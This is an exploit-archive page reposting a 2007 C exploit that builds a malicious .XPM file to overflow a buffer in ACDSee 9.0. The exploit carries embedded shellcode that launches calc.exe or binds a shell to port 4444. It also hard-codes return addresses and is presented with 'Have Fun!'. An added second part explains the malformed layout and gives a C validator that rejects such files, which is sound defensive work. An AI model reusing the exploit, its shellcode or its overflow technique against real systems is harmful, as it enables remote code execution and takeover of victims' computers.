ACDSee 9.0 (.XPM File) Local Buffer Overflow Exploit
Source: Marsupilamipowa@hotmail.fr  Author: Marsu  Published: 2007-04-23
/*****************************************************************************
*                  ACDSee v9.0 .XPM File Buffer Overflow                     *
*                                                                            *
*                                                                            *
* ACDSee is vulnerable to an unspecified buffer overflow when processing a   *
* crafted .XPM file.                                                         *
* This exploit runs calc.exe or binds shell to port 4444, and works against  *
* ACDSee and ACDSee Quick View.                                              *
*                                                                            *
* Tested against Win XP SP2 FR.                                              *
* Have Fun!                                                                  *
*                                                                            *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>                 *
*****************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   // memset, memcpy, strlen

/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x98"
"\x11\xbe\xa7\x83\xeb\xfc\xe2\xf4\x64\xf9\xfa\xa7\x98\x11\x35\xe2"
"\xa4\x9a\xc2\xa2\xe0\x10\x51\x2c\xd7\x09\x35\xf8\xb8\x10\x55\xee"
"\x13\x25\x35\xa6\x76\x20\x7e\x3e\x34\x95\x7e\xd3\x9f\xd0\x74\xaa"
"\x99\xd3\x55\x53\xa3\x45\x9a\xa3\xed\xf4\x35\xf8\xbc\x10\x55\xc1"
"\x13\x1d\xf5\x2c\xc7\x0d\xbf\x4c\x13\x0d\x35\xa6\x73\x98\xe2\x83"
"\x9c\xd2\x8f\x67\xfc\x9a\xfe\x97\x1d\xd1\xc6\xab\x13\x51\xb2\x2c"
"\xe8\x0d\x13\x2c\xf0\x19\x55\xae\x13\x91\x0e\xa7\x98\x11\x35\xcf"
"\xa4\x4e\x8f\x51\xf8\x47\x37\x5f\x1b\xd1\xc5\xf7\xf0\x6f\x66\x45"
"\xeb\x79\x26\x59\x12\x1f\xe9\x58\x7f\x72\xdf\xcb\xfb\x3f\xdb\xdf"
"\xfd\x11\xbe\xa7";


/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char BindShellcode[] =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5c"
"\x7b\x78\x7f\x83\xeb\xfc\xe2\xf4\xa0\x11\x93\x32\xb4\x82\x87\x80"
"\xa3\x1b\xf3\x13\x78\x5f\xf3\x3a\x60\xf0\x04\x7a\x24\x7a\x97\xf4"
"\x13\x63\xf3\x20\x7c\x7a\x93\x36\xd7\x4f\xf3\x7e\xb2\x4a\xb8\xe6"
"\xf0\xff\xb8\x0b\x5b\xba\xb2\x72\x5d\xb9\x93\x8b\x67\x2f\x5c\x57"
"\x29\x9e\xf3\x20\x78\x7a\x93\x19\xd7\x77\x33\xf4\x03\x67\x79\x94"
"\x5f\x57\xf3\xf6\x30\x5f\x64\x1e\x9f\x4a\xa3\x1b\xd7\x38\x48\xf4"
"\x1c\x77\xf3\x0f\x40\xd6\xf3\x3f\x54\x25\x10\xf1\x12\x75\x94\x2f"
"\xa3\xad\x1e\x2c\x3a\x13\x4b\x4d\x34\x0c\x0b\x4d\x03\x2f\x87\xaf"
"\x34\xb0\x95\x83\x67\x2b\x87\xa9\x03\xf2\x9d\x19\xdd\x96\x70\x7d"
"\x09\x11\x7a\x80\x8c\x13\xa1\x76\xa9\xd6\x2f\x80\x8a\x28\x2b\x2c"
"\x0f\x28\x3b\x2c\x1f\x28\x87\xaf\x3a\x13\x69\x23\x3a\x28\xf1\x9e"
"\xc9\x13\xdc\x65\x2c\xbc\x2f\x80\x8a\x11\x68\x2e\x09\x84\xa8\x17"
"\xf8\xd6\x56\x96\x0b\x84\xae\x2c\x09\x84\xa8\x17\xb9\x32\xfe\x36"
"\x0b\x84\xae\x2f\x08\x2f\x2d\x80\x8c\xe8\x10\x98\x25\xbd\x01\x28"
"\xa3\xad\x2d\x80\x8c\x1d\x12\x1b\x3a\x13\x1b\x12\xd5\x9e\x12\x2f"
"\x05\x52\xb4\xf6\xbb\x11\x3c\xf6\xbe\x4a\xb8\x8c\xf6\x85\x3a\x52"
"\xa2\x39\x54\xec\xd1\x01\x40\xd4\xf7\xd0\x10\x0d\xa2\xc8\x6e\x80"
"\x29\x3f\x87\xa9\x07\x2c\x2a\x2e\x0d\x2a\x12\x7e\x0d\x2a\x2d\x2e"
"\xa3\xab\x10\xd2\x85\x7e\xb6\x2c\xa3\xad\x12\x80\xa3\x4c\x87\xaf"
"\xd7\x2c\x84\xfc\x98\x1f\x87\xa9\x0e\x84\xa8\x17\xac\xf1\x7c\x20"
"\x0f\x84\xae\x80\x8c\x7b\x78\x7f";


// Decodes to: /* XPM */ CRLF  static char *Pixmap[] = { CRLF  "509 438 256 3", CRLF  and an opening quote
char XPMHeaders[]=
"\x2f\x2a\x20\x58\x50\x4d\x20\x2a\x2f\x0d\x0a\x73\x74\x61\x74\x69"
"\x63\x20\x63\x68\x61\x72\x20\x2a\x50\x69\x78\x6d\x61\x70\x5b\x5d"
"\x20\x3d\x20\x7b\x0d\x0a\x22\x35\x30\x39\x20\x34\x33\x38\x20\x32"
"\x35\x36\x20\x33\x22\x2c\x0d\x0a\x22";

int main(int argc, char* argv[])
{
    FILE* xpmfile;
    char evilbuff[6600];

    printf("[+] ACDSee v9.0 .XPM File Buffer Overflow\n");
    printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>\n");
    if (argc!=3) {
        printf("[+] Usage: %s Mode <file.xpm>\n",argv[0]);
        printf("[+] Mode is 0 -> run calc.exe\n");
        printf("[+]         1 -> bind shell to port 4444\n");
        return 0;
    }

    // Fill the whole buffer with 'A' padding, then place the XPM header at the start
    memset(evilbuff,'A',6600);
    memcpy(evilbuff,XPMHeaders,sizeof(XPMHeaders)-1);

    memcpy(evilbuff+0x1040,"\x05\x03\x81\x7C",4); //call ebx in kernel32. This one is for ACDsee9.exe
    memcpy(evilbuff+0x10a4,"\x90\x90\xeb\x16\x2a\x02\xfc\x7f\x2a\x02\xfc\x7f",12); //pop pop ret in ???. Works for ACDsee9.exe and ACDSeeQV.exe

    // Payload selected by Mode (neither shellcode contains a NUL byte, so strlen yields its full length)
    if (!atoi(argv[1]))
        memcpy(evilbuff+0x11a0,CalcShellcode,strlen((const char*)CalcShellcode));
    else
        memcpy(evilbuff+0x11a0,BindShellcode,strlen((const char*)BindShellcode));

    //End of XPM file
    memcpy(evilbuff+0x1916,"\x22\x0d\x0a\x29\x3b\x0d\x0a",7);

    if ((xpmfile=fopen(argv[2],"wb"))==NULL) {
        printf("[-] Unable to access file.\n");
        return 0;
    }

    fwrite( evilbuff, 1, 6600, xpmfile );
    fclose(xpmfile);
    printf("[+] Done. Have fun!\n");
    return 0;
}
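
The generator above writes a 57-byte XPM header whose values line declares 509 x 438 pixels, 256 colours and 3 characters per pixel, and then a single quoted string of 'A' padding that runs for thousands of bytes before the closing quote at offset 0x1916. XPM's own grammar bounds every string: a colour-table entry is a short token plus a colour specification, and a pixel row is exactly width * chars_per_pixel characters, all printable ASCII. The checker below is an added example, not code from the page's author or from ACDSee; it validates an in-memory XPM against its declared geometry before any string is copied anywhere, which is the check a viewer's loader (or a file-scanning rule) needs to reject this kind of input. MAX_COLOR_LINE (256) is an assumed bound, and the three sample inputs are constructed inline; the crafted ones reuse the generator's exact header so the verdicts reflect that layout.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Verdicts returned by check_xpm(). */
enum xpm_verdict {
    XPM_OK = 0,
    XPM_BAD_HEADER,       /* missing XPM magic or unusable values line */
    XPM_UNTERMINATED,     /* an opening quote never closes before EOF */
    XPM_OVERLONG_STRING,  /* a string longer than the values line permits */
    XPM_NONPRINTABLE,     /* raw bytes outside 0x20..0x7e inside a string */
    XPM_BAD_ROW,          /* pixel row not exactly width * chars_per_pixel */
    XPM_TRUNCATED         /* fewer strings than ncolors + height */
};

/* Assumed sane bound for a colour-table entry such as "abc c #rrggbb". */
#define MAX_COLOR_LINE 256

/* Find the next double-quoted string at or after *pos: 1 on success
 * (body at *start, length *slen, *pos moved past it), 0 if none, -1 if unclosed. */
static int next_string(const unsigned char *buf, size_t len, size_t *pos,
                       size_t *start, size_t *slen)
{
    size_t s, e = *pos;
    while (e < len && buf[e] != '"') e++;
    if (e >= len) return 0;
    s = ++e;
    while (e < len && buf[e] != '"') e++;
    if (e >= len) return -1;
    *start = s; *slen = e - s; *pos = e + 1;
    return 1;
}

/* Validate an in-memory XPM against its own declared geometry. */
int check_xpm(const unsigned char *buf, size_t len)
{
    size_t pos = 0, s, n, row_len, limit, k;
    long w, h, nc, cpp, idx;
    char values[64];
    int r;

    if (len < 9 || memcmp(buf, "/* XPM */", 9) != 0) return XPM_BAD_HEADER;

    /* Values line: "<width> <height> <ncolors> <chars_per_pixel>" */
    r = next_string(buf, len, &pos, &s, &n);
    if (r == 0) return XPM_BAD_HEADER;
    if (r < 0) return XPM_UNTERMINATED;
    if (n >= sizeof values) return XPM_BAD_HEADER;
    memcpy(values, buf + s, n);
    values[n] = '\0';
    if (sscanf(values, "%ld %ld %ld %ld", &w, &h, &nc, &cpp) != 4) return XPM_BAD_HEADER;
    if (w <= 0 || h <= 0 || nc <= 0 || cpp <= 0 || cpp > 8 || w > 65535 || h > 65535)
        return XPM_BAD_HEADER;
    row_len = (size_t)w * (size_t)cpp;

    /* nc colour-table entries come first, then exactly h pixel rows. */
    for (idx = 0; idx < nc + h; idx++) {
        r = next_string(buf, len, &pos, &s, &n);
        if (r == 0) return XPM_TRUNCATED;
        if (r < 0) return XPM_UNTERMINATED;
        limit = (idx < nc) ? MAX_COLOR_LINE : row_len;
        if (n > limit) return XPM_OVERLONG_STRING;
        for (k = 0; k < n; k++)
            if (buf[s + k] < 0x20 || buf[s + k] > 0x7e) return XPM_NONPRINTABLE;
        if (idx >= nc && n != row_len) return XPM_BAD_ROW;
    }
    return XPM_OK;
}

/* Constructed well-formed 2x2 image: 2 colours, 1 char per pixel. */
static const char benign_xpm[] =
    "/* XPM */\n"
    "static char *Pixmap[] = {\n"
    "\"2 2 2 1\",\n"
    "\". c #000000\",\n"
    "\"# c #ffffff\",\n"
    "\".#\",\n"
    "\"#.\"\n"
    "};\n";

int demo_benign(void)
{
    return check_xpm((const unsigned char *)benign_xpm, sizeof benign_xpm - 1);
}

/* Constructed samples shaped like the generator's output: its 57-byte header
 * (values "509 438 256 3"), 'A' padding where the first colour entry should be,
 * and either a closing quote only near the end of the buffer or none at all. */
static const char crafted_header[] =
    "/* XPM */\r\nstatic char *Pixmap[] = {\r\n\"509 438 256 3\",\r\n\"";

static int crafted(int close_it)
{
    static unsigned char buf[4096];
    memset(buf, 'A', sizeof buf);
    memcpy(buf, crafted_header, sizeof crafted_header - 1);
    if (close_it) memcpy(buf + sizeof buf - 7, "\"\r\n);\r\n", 7);
    return check_xpm(buf, sizeof buf);
}
int demo_overlong(void)     { return crafted(1); }
int demo_unterminated(void) { return crafted(0); }

int main(int argc, char **argv)
{
    static unsigned char buf[1 << 20];
    size_t n;
    FILE *f;
    if (argc != 2) { fprintf(stderr, "usage: %s file.xpm\n", argv[0]); return 2; }
    if ((f = fopen(argv[1], "rb")) == NULL) { perror("fopen"); return 2; }
    n = fread(buf, 1, sizeof buf, f);
    fclose(f);
    printf("%s: verdict %d\n", argv[1], check_xpm(buf, n));
    return 0;
}
```

The checker reads the values line first and derives every later bound from it, so a file cannot smuggle an arbitrarily long string past the parser regardless of what the loader's internal buffer size happens to be; the crafted sample trips XPM_OVERLONG_STRING on its very first string, and the same layout without a closing quote trips XPM_UNTERMINATED.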

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved